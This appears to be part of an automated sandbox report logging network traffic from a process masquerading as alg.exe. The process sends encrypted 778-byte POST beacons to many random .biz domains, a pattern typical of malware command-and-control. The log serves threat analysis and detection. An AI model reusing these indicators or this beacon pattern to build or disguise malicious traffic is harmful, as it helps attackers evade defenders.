                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.879339933 CET778OUTData Raw: 17 95 ea ec 95 84 26 5f fe 02 00 00 4d 0e 12 b7 7a 65 0f 8e 0a 5b f7 61 99 90 f8 4a 34 39 27 64 eb 7a 94 b6 a1 d5 02 af c4 f9 59 82 27 ed c0 83 70 d5 74 0d c3 5f c4 77 b1 d9 5c bd 2d 5a 5e 8d ba 1b cb 39 e0 9c 20 89 e1 bf 68 c3 25 e6 76 84 bc 5c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: &_Mze[aJ49'dzY'pt_w\-Z^9 h%v\g69-_TL%t^v6*-=N9d&)vzo7h1Jw5h3%ojUVWLY!&wEkFifR<_Ie]
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:02.700972080 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4bceac6fe08da8ef539904a3985c7128|155.94.241.188|1730129882|1730129882|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        40192.168.2.44979718.208.156.248806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.009713888 CET350OUTPOST /kjptih HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.009752035 CET778OUTData Raw: ed fc ab bc 1b 77 69 34 fe 02 00 00 0f e0 10 ca 16 1a 19 99 6c 90 d2 aa 14 a0 fc 02 13 0b 0b 39 83 6a 25 33 30 5c c9 77 ce 0c 33 4d 41 bf 04 bd 88 76 2b 1b ba c6 50 36 c1 b0 0e 5e 43 37 db ca 3b 9d de 36 d1 44 83 a3 cd 3c 2c a5 80 56 b1 48 6b f9
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: wi4l9j%30\w3MAv+P6^C7;6D<,VHk*l?IYQQ!QC5;%~qE/p!~wj0W+[,/S=a @(+G?^0|c@d7y4oVoO/grVimcIm
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.682817936 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3b26d27946529c6e9f54a8feff6e627b|155.94.241.188|1730129883|1730129883|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        41192.168.2.44980313.251.16.150806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.926799059 CET352OUTPOST /ttxmcyeqta HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:03.926824093 CET778OUTData Raw: c7 ab 74 2d 78 23 b3 c0 fe 02 00 00 ad b6 3a 99 3c 84 18 08 60 34 91 ae 18 4c 98 4e e2 c4 82 38 6a 16 43 b9 9b 50 0d 22 bb 32 1e 7d fa 1c 4e 24 ec 4d 61 f2 0f 61 76 be 7c 47 03 cb 39 b4 5e fe 22 5f bb 52 ef bf 3b d4 78 aa c7 ce d6 2e e0 8e 9a bb
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: t-x#:<`4LN8jCP"2}N$Maav|G9^"_R;x.1za{J_}<rbI%fKcpU}H/Aeoh>!.5)1MDm|G/2?+y\__na?nrni\k|w0^6.FsU#XRpb+xRQQe
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.384819984 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=666ca44c663d0e49436606dff1c4b709|155.94.241.188|1730129885|1730129885|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        42192.168.2.44981113.251.16.150806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.593991995 CET360OUTPOST /xndhuecwgokoeqk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:05.594240904 CET778OUTData Raw: 1b 33 d2 b2 88 97 e5 fc fe 02 00 00 7e 10 8d de f8 f3 5c 0b 97 41 39 81 c3 af 99 92 36 3d 34 ba 7b de 36 fb 96 99 31 71 4c ce c3 6b 0b 98 4d 98 27 bb 53 a2 ad af b8 37 93 5d be c2 22 db b8 f3 5c 3f f5 cb 94 67 da 24 f8 d2 9e c7 68 83 20 a2 4d bf
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3~\A96=4{61qLkM'S7]"\?g$h Mr>wMV+aT5r31B%oe}-<rd($FLzS0S^#sqsc&I_9!3oVO>VV(]lzs~dbh
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.029905081 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2a3edbca467e30f9691b0318876334ac|155.94.241.188|1730129886|1730129886|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        43192.168.2.44982434.211.97.45806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.498008013 CET354OUTPOST /yyjnpedbcl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:07.498025894 CET778OUTData Raw: ff 43 1b 54 58 71 2a a6 fe 02 00 00 85 c0 c5 aa 63 75 4e ce 67 4d 1c 07 83 9b 2b ab 78 9a 5d d9 cc c1 d6 ea 77 e6 96 eb 82 1b 58 83 c8 e1 a9 d6 c8 0e c0 7f d7 c4 3c f3 59 77 b1 01 2a d8 1a 5b 6b b6 5f 7f 20 26 e3 a8 33 82 24 59 b4 1c 51 17 e7 dc
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: CTXq*cuNgM+x]wX<Yw*[k_ &3$YQd3gL]?$L*5'4:5CL<FVWi5m.%pL|.oJ8[@)*m};Ir1Zf4MWGQNpxv^oT;#,7
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.320926905 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ae6700dcfefe50ac2a315128da9f9b84|155.94.241.188|1730129888|1730129888|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        44192.168.2.44983047.129.31.212806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.893642902 CET356OUTPOST /jkvhfxewyayfhg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:08.893660069 CET778OUTData Raw: 09 24 1f 78 fd 6d 16 61 fe 02 00 00 d8 72 43 19 2e 67 fe 9c cc 8e 60 fc 2b a4 05 b6 87 5b 50 4c 46 46 12 d7 ac c8 34 0b 93 21 ab 69 0c 51 9d 8e 29 0b 55 b5 67 65 d1 98 bf 07 c2 d4 d6 62 3c 18 b2 79 82 ca f8 c4 7d 0e c2 46 ff 84 0c 0e 75 d5 38 68
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $xmarC.g`+[PLFF4!iQ)Ugeb<y}Fu8h:m~:"usW(8k=T[4(zp$v&2DBQz!:}BT<xhYdv0W}t"7ty:*=r3jB2iavFIxz|f_H
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.346488953 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c3c54d14b21f97d23ddf0806bb939a59|155.94.241.188|1730129890|1730129890|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        45192.168.2.44983913.251.16.150806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.754662037 CET356OUTPOST /sxtbjbwlxwcwo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:10.754662037 CET778OUTData Raw: 0b 73 13 5c f7 f6 f5 b0 fe 02 00 00 70 7e 2e d6 70 ae 06 c9 1e 21 48 51 34 86 9c 29 cc 90 e4 cc 4e 71 e7 91 a6 3b d6 53 ad 83 62 a8 06 2d f2 c3 88 f1 09 22 de 18 ab e5 ad f7 06 98 8c 41 f0 c8 0b ad 4b bd 15 54 f7 27 b9 48 e1 d3 03 8d 26 b2 b6 39
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: s\p~.p!HQ4)Nq;Sb-"AKT'H&9$g~TI1ukYx$hSK,"'kNN2TUPtC?FC3*@q!DieA!o:s5z>G,)B(lpP=yx
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.195576906 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d3afd1246eff468c68274730cccf2278|155.94.241.188|1730129891|1730129891|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        46192.168.2.44985034.211.97.45806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.594521999 CET351OUTPOST /fvsaltcygk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:12.594521999 CET778OUTData Raw: d9 fb 84 4a 47 14 4e f2 fe 02 00 00 65 7f 4a 13 5b b9 a1 bc a2 0a 0c f7 c8 5e 87 8f d1 8a 15 9c 12 9a 77 3e c7 b8 6c a1 f3 b0 53 72 41 c2 a7 ba 35 29 55 21 5e f1 63 24 71 f4 ce a7 95 74 48 fb b4 db 16 96 b8 35 9a c1 11 bf f4 bd 8f f3 9a e8 35 d3
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: JGNeJ[^w>lSrA5)U!^c$qtH55W%{_"hl~$JH:E k;c`/1s-AhFIuBrcXAjMF/%/4Pro} rJ<Uqn/wLj@??&xT
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:13.437880993 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=fc57c6575ad8c553113a538687f61070|155.94.241.188|1730129893|1730129893|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        47192.168.2.4498573.94.10.34806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.039732933 CET351OUTPOST /jfrndo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.039758921 CET778OUTData Raw: ad fd 03 43 fc 11 06 ba fe 02 00 00 e2 44 de 03 10 c2 e4 ca 00 c3 24 fb 69 93 51 b3 e7 73 52 44 15 e5 4d 98 6a 61 45 7a 99 05 01 7a f6 a3 59 85 d7 c7 55 78 ad a5 72 76 8a cf c3 7d 0a 39 58 2e 02 f2 10 ad 62 69 c6 01 23 59 23 f2 5b 7a 8f e0 8e 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: CD$iQsRDMjaEzzYUxrv}9X.bi#Y#[z$lS ~qf6f|hK=QPo.H]_}bz)RF0^9fpe_qV)s4Wf?1Z!!D,eGq0aSzSP`meW
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:14.703419924 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5799b860584bcda4c9b80f165e3dcbc5|155.94.241.188|1730129894|1730129894|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        48192.168.2.44986618.246.231.120806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.069752932 CET353OUTPOST /akhgyldyrj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.069777966 CET778OUTData Raw: 1f eb 89 5f c2 16 10 f0 fe 02 00 00 61 6b 5c 3d 06 b7 cd 9b 6f c0 b9 8a 11 1e d3 7f 19 2a 79 58 49 22 cc 8b 29 bd 62 a5 ab dc 38 ba d6 e6 34 d4 48 d5 59 01 a2 5d 8f 25 e6 b5 f7 b2 8c 0a 49 14 b5 f1 f2 f3 66 11 e3 79 77 21 e4 a8 b4 a2 9b 44 84 41
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: _ak\=o*yXI")b84HY]%Ifyw!DARO7W}/YmQe*SXs|`t.iPkJOnzFEN@{\4M7JBLT\bBx)i@qnHd(0s7~Z'
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:15.892615080 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d82852d64ec3fe7762c357a888509f7c|155.94.241.188|1730129895|1730129895|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        49192.168.2.4498733.254.94.185806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.102674961 CET347OUTPOST /wrdfsv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
